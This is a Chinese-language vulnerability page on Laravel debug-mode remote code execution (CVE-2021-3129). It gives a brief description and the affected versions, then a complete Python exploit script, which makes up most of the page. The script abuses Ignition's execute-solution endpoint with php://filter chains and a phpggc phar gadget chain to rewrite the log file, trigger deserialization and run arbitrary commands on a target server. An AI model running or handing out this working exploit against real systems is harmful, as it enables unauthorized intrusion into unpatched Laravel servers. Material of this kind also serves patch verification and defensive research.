Laravel_Debug_mode_RCE_CVE-2021-3129

# Laravel Debug mode RCE CVE-2021-3129
Laravel是一套簡潔、開源的PHP Web開發框架(PHP Web Framework)，旨在實現Web軟件的MVC架構。

2021年01月12日，Laravel被披露存在一個遠程代碼執行漏洞（CVE-2021-3129）。當Laravel開啟了Debug模式時，由於Laravel自帶的Ignition組件對file_get_contents()和file_put_contents()函數的不安全使用，攻擊者可以通過發起惡意請求，構造惡意Log文件等方式觸發Phar反序列化，最終造成遠程代碼執行。

==影響範圍==

Laravel <= 8.4.2 Ignition <2.5.2 ==漏洞環境== Github：https://github.com/SNCKER/CVE-2021-3129 ==漏洞利用==

# -*- coding=utf-8 -*-
# Author : Crispr
import os
import requests
import sys
 
class EXP:
    #这里还可以增加phpggc的使用链，经过测试发现RCE5可以使用
    __gadget_chains = {
        “monolog_rce5″:r”””
         php -d “phar.readonly=0” ./phpggc Laravel/RCE5 “%s” –phar phar -o php://output | base64 -w 0 | python -c “import sys;print(”.join([‘=’ + hex (ord(i))[2:] + ‘=00’ for i in sys.stdin.read()]).upper())”
        “””
    }
 
    def __vul_check(self):
        res = requests.get(self.__url,verify=False)
        if res.status_code != 405 and “laravel” not in res.text:
            print(“[+]Vulnerability does not exist”)
            return False
        return True
 
    def __payload_send(self,payload):
        header = {
            “Accept”: “application/json”
        }
        data = {
            “solution”: “Facade\\Ignition\\Solutions\\MakeViewVariableOptionalSolution”,
            “parameters”: {
                “variableName”: “cve20213129”,
                “viewFile”: “”
            }
        }
        data[“parameters”][“viewFile”] = payload
        
        print(data)
        res = requests.post(self.__url, headers=header, json=data, verify=False)
        return res
 
    def __clear_log(self):
        payload = “php://filter/write=convert.iconv.utf-8.utf-16be|convert.quoted-printable-encode|convert.iconv.utf-16be.utf-8|convert.base64-decode/resource=../storage/logs/laravel.log”
        return self.__payload_send(payload=payload)
 
    def __generate_payload(self,gadget_chain):
        generate_exp = self.__gadget_chains[gadget_chain] % self.__command
        #print(generate_exp)
        exp = “”.join(os.popen(generate_exp).readlines()).replace(“\n”,””)+ ‘a’
        print(“[+]exploit:”)
        print(exp)
        return exp
 
    def __decode_log(self):
        return self.__payload_send(
            “php://filter/write=convert.quoted-printable-decode|convert.iconv.utf-16le.utf-8|convert.base64-decode/resource=../storage/logs/laravel.log”)
 
    def __unserialize_log(self):
        return self.__payload_send(“phar://../storage/logs/laravel.log/test.txt”)
 
    def __rce(self):
        text = str(self.__unserialize_log().text)
        #print(text)
        text = text[text.index(‘]’):].replace(“}”,””).replace(“]”,””)
        return text
 
    def exp(self):
        for gadget_chain in self.__gadget_chains.keys():
            print(“[*] Try to use %s for exploitation.” % (gadget_chain))
            self.__clear_log()
            self.__clear_log()
            self.__payload_send(‘A’ * 2)
            self.__payload_send(self.__generate_payload((gadget_chain)))
            self.__decode_log()
            print(“[*] Result:”)
            print(self.__rce())
 
    def __init__(self, target, command):
        self.target = target
        self.__url = requests.compat.urljoin(target, “_ignition/execute-solution”)
        self.__command = command
        if not self.__vul_check():
            print(“[-] [%s] is seems not vulnerable.” % (self.target))
            print(“[*] You can also call obj.exp() to force an attack.”)
        else:
            self.exp()
 
def main():
    EXP(“http://127.0.0.1:8888”,sys.argv[1])
 
if __name__ == “__main__”:
    main()

Github：https://github.com/crisprss/Laravel_CVE-2021-3129_EXP